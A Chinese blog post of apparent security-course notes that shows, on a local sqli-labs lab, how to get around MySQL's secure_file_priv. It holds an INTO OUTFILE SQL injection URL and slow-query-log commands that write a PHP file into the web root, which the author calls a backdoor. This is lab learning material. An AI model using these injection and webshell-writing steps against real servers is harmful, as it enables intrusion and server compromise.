(2020上半年第8天)小迪网络安全笔记(问题①)如何突破MYSQL的secure_file_priv防护

最新推荐文章于 2022-09-06 15:28:13 发布
最新推荐文章于 2022-09-06 15:28:13 发布
阅读量590 收藏 3
点赞数 2
分类专栏: 2020全年小迪网络安全笔记 文章标签: 安全 安全漏洞 云安全 app安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013630181/article/details/118066871
版权

文件读写注入需要考虑mysql版本问题,高版本存在secure_file_priv过滤,高版本突破,低版本直接写入
数据库如果是高版本,数据库会有防御,解决方法两种,硬钢或者绕过,
硬钢参考:https://www.cnblogs.com/c1e4r/articles/8902444.html
我是用硬刚的方法,下面是我硬钢的过程:
出现这样的问题:

在处理sqlilabs第七关,
写入url:http:\\127.0.0.1\sqlilabs\Less-7\?id=1’)) union select null,’aaaa’,null into outfile ‘D:\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt’--+
出现
在这里插入图片描述
我先分析了网站,没有任何问题(url进入php后台没有任何问题,直接进入数据库执行好像出现了问题)
在这里插入图片描述

后来我们进入mysql命令行看一下哪里出现了问题( 把url转成sql看看出现什么问题了)
注意:
新版本phpstudypro好像没有mysql命令行,找新版本命令行过程看我的这个链接:[问题②](https://blog.csdn.net/u013630181/article/details/118066915) 老版本phpstudy找mysql命令行过程:网上多的是问度娘。 好的我们进入命令行 输入命令:C:\Users\使用者>D:\phpstudy_pro\Extensions\MySQL5.7.26\bin\mysql.exe mysql -u root -p`
在这里插入图片描述

password就是我们要写mysql的密码
在这里插入图片描述

展示有哪些数据库:show databases;
在这里插入图片描述

输入数据库Use security
在这里插入图片描述

现在我们把url转成数据库语言看看出现什么问题
Url:http:\127.0.0.1\sqlilabs\Less-7?id=1’)) union select null,’aaaa’,null into outfile ‘D:\phpstudy_pro\WWW\sqlilabs\Less-7\1.txt’–+
相当于sql:select * from users where id=((‘1’)) union select null,’aaaa’,null into outfile ‘D:/phpstudy_pro/WWW/sqlilabs/Less-7/1.txt’–+’)) limit 0,1;(注意符号)
在这里插入图片描述

出现这样的未知问题我们先ctrl+c退出来。
在输入:select * from users where id=((‘1’)) union select null,’aaaa’,null into outfile ‘D:/phpstudy_pro/WWW/sqlilabs/Less-7/1.txt’
出现
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
在这里插入图片描述

出现这个的原因是高版本数据库有防御
---------------------------------------------分割线-----------------------------------------------------------
原因我们找到了那现在就解决吧
网上的解决方法有两种一种是关闭防护(这个第一种最好就不用,实战中受害方不会关闭数据库防护)还有一种是突破,下面我实验的就是突破的这种方法(这种突破方法执行一次用一次后期演示我会把数据库防护关闭):
参考文章:www.cnblogs.com/c1e4r/articles/8902444.html(操作的时候就是把那三句sql执行)(相当于写了一个有后门的文件放到受害者服务器中)
下面开始:
由于这里还没讲sql语句直接注入,so文献中的三句话直接在数据库语句一下吧,
Sql语句:

 set global slow_query_log=1set global slow_query_log_file='D:\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt'SELECT '<?php asdsd?>' or sleep(11)

效果:在D:\phpstudy_pro\WWW\sqlilabs\Less-7下创建一个名为1.txt的文本,(注意必须写\,不然创建不了)文本内容为?php asdsd?
好的现在url可以用了:http:\\127.0.0.1\sqlilabs\Less-7\?id=1’)) union select null,’aaaa’,null into outfile ‘D:\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt’--+
效果(网站没反应,但是目录下已经出现了该文件)

.白菜白菜大白菜.
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Mac中MySQL数据的导入导出问题(secure-file-priv)
weixin_44957840的博客
06-11 1353
在操作数据库的时候遇到了数据库导入导出的问题☹️,具体报错内容如下: ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement 我的解决办法????????‍????: (1)首先查看 secure-file-priv 的设置情况 在终端进入 MySQL后输入命令 show variables like ‘secure_fi
【phpMyadmin】MYSQL突破secure_file_priv写shell提权
最新发布
失心少年
09-19 942
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
MYSQL突破secure_file_priv写shell
W小哥
11-19 1324
目标IP地址:192.168.106.130 本地IP地址:192.168.106.1 访问目标网络如下图所示: 实验场景: 某些情况下,当我们进入网站phpmyadmin或者网站后台执行SQL命令,计划通过select into outfile写一句话木马(shell),但是通常都会报错,如下图所示: 原因: 在mysqlsecure_file_priv的值默认为NULL。并且无法用s...
MySQL绕过secure_file_priv利用慢查询写shell
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-29 2503
通常情况下,找到一个注入点后,或者进入到一个网站的phpMyAdmin时,想通过into outfile写shell时,会通常会报错 这是因为MySQL配置文件中的secure_file_priv的值默认为NULL。 只有当他为非空值的时候才可以利用into outfile写文件。 我们可以利用日志来进行写shell,然后利用文件包含漏洞来包含日志文件,从而拿到服务器一定的权限。 利用慢查询来写shell 1、设置slow_query_log=1.即启用慢查询日志(默认禁用) set global slow
mysql配置secure_file_priv
jkzyx123的博客
09-06 8211
secure_file_priv 配置项控制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()的使用权限。
除了文件上传还有哪些方式可以写一句话木马?
qq_51553814的博客
11-29 2280
除了文件上传还有哪些方式可以写一句话木马? 一句话木马如果上传到服务器的话,有啥危害学过网络安全的人都知道。但是通常网上流传的方式都是通过文件上传来实现木马上传,实在太过老套,这里就教大家几个新的方式来本地生成一句话木马。(这篇笔记知识带大家入个门,想了解的话还得自己查询资料来学习) 这篇笔记也是有很多跳转内容,看不懂可以尝试看看跳转的博客,他们写的一定是比我更好 结合sql注入生成一句话木马 讲这之前得先介绍mysql配置文件中的secure_file_priv选项 secure_file_priv配置
第六 SQL注入
weixin_46653764的博客
05-28 691
一、sql注入的原理 不管是用什么语言编写的Web应用,它们都有一个共同点,就是具有交互性并且大多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞。 **sql注入**是一种通过操作sql语句进行攻击目的的技术 二、MYSQL注入--上部分 1、sql语句 创建数据库:CREATE DATABASE database_name 删除数据库:drop database database_name 创建新表:create table mytabl
Web安全第7讲 - MySQL注入读写文件、HTTP头中的SQL注入、绕过SQL注入
Yauger的博客
02-20 408
一、MySQL注入读写文件 1.1 查看是否有权限在mysql读写文件 读取前提: 1.用户权限足够高,尽量具有root权限 2.secure_file_priv不为null 1.1.1 打开命令行查看 show global variables like 'secure_file_priv'; 1.1.2 打开mysql-ini 1.1.3 在最后添加,保存,并重启mysql服务 se...
Windows下MySQL8.0中secure_file_priv为NULL解决办法
12-14
后来想导出数据库里面的一些数据,提示我secure_file_priv=null,报错,后来网上找了很多方法,说只需要在my.ini里面加一行secure_file_priv=””(或者是你自己想要的路径,如”D:/MySQL”),然后重启mysql (用...
MySQL导出数据遇到secure-file-priv问题的解决方法
01-21
ERROR 1290 (HY000): The MySQL server is running with the –secure-file-priv option so it cannot execute this statement. 对于上述错误,相信对于第一次执行 MySQL 数据导出操作的同学大都会遇见。至于为什么...
windows mysql8.0 解决 secure-file-priv null的问题
11-10
解决 my.ini 文件中设置secure_file_priv = ,show variables like “%secure%查询secure_file_priv 取值仍为null 的问题
Mysql 5.7.18 利用MySQL proxies_priv实现类似用户组管理
09-09
主要为大家详细介绍了Mysql 5.7.18利用MySQL proxies_priv实现类似用户组管理,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
php admin_priv,一次phpmyadmin突破secure_file_priv写shell 的渗透
weixin_39664560的博客
03-13 205
晚上下闲来无事,租的公寓一共两间房,我和另外一个同学各住一间,隔壁一墙之隔的他正在打游戏,我比较爱学习,随便玩玩,就突然引发了一次简单渗透。。。 无关紧要的过程就不写了,下面简单记录下主要有用的步骤。首先nmap扫描内网发现发现内网里面存活的主机,不多,简单排除下,估计192.168.1.101就是隔壁室友的电脑了,发现80、3306端口图片.png访问下80,如下图,最近在做毕业设计,很明显这是...
filebeat采集规则
lclxfd的博客
01-11 356
采集最新生产日志;日志按条采集,区分每条日志的字符分割符\n
mysql5.7导出数据提示–secure-file-priv选项问题的解决方法
Bertram的博客
06-21 6738
错误提示 mysql5.7导出数据提示–secure-file-priv选项问题的解决方法 MYSQL导入数据出现ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement mysql可使用 into outfile参数把某表中数据导出到一个文件中,例如可用以下命令把user表的数据导出到user.txt select * in
详述 MySQL 导出数据遇到 secure-file-priv问题
热门推荐
CG国斌的博客
10-01 3万+
ERROR 1290 (HY000): The MySQL server is running with the –secure-file-priv option so it cannot execute this statement. 对于上述错误,相信对于第一次执行 MySQL 数据导出操作的同学大都会遇见。至于为什么会遇到这个错误,原因很简单,那就是:我们不知道 MySQL 默认的导出目录是哪
08MySQL 中的日志文件
greatwind的博客
09-21 1810
MySQL 中的日志文件错误日志中继日志普通查询日志慢查询日志二进制日志 MySQL 中有六种日志文件,分别是二进制日志(binary log)、错误日志(error log)、慢查询日志(slow query log)、通用查询日志(general query log)、中继日志(relay log)、元数据日志(metadata log),这些日志文件在数据库中各司其职。 错误日志 错误日志是用来记录 MySQL 服务器在启动、停止和运行过程中发生任何严重警告和错误的信息。 查看错误日志的位置: SHO
关于mysql --secure-file-priv 突破模拟测试记录
weixin_36829246的博客
04-01 555
前提省略。。。。 (已经获取到mysql的root及密码),进行系统提权时遇到–secure-file-priv 设置。 使用msf的auxiliary/admin/mysql/mysql_sql模块 首先设置slow_query_log=1.即启用慢查询日志(默认禁用)。 set global slow_query_log=1; 接着伪造(修改)slow_query_log_file日志输出...
2020上半年第6小迪网络安全笔记(操作)sqlilabs靶机环境搭建
u013630181的博客
06-14 1万+
材料:phpstudy2018 链接:phpstudy2018 和sqli-labs链接:sqlilabs 第一步:下载解压这个就不细说了 第二步:phpstudy2018打开 这里老师截不上图,我还是说一下吧 切换版本这里我选的是php-5.4.45 ②其他选项选择(网站根目录)打开目录后把sqlilabs下载的rar解压到这个里面 ③也可以直接到文档:D:\php2\PHPTutorial\WWW 第三步: 打开D:\phpStudy\PHPTutorial\WWW\sqli-labs\sql-co
mysql修改secure_file_priv
05-26
secure_file_privMySQL的一个系统变量,用于限制LOAD DATA INFILE和SELECT ... INTO OUTFILE操作的文件读写权限。如果未设置secure_file_priv,则默认情况下,这些操作将被允许在任何目录中读取和写入文件。 要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

.白菜白菜大白菜.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值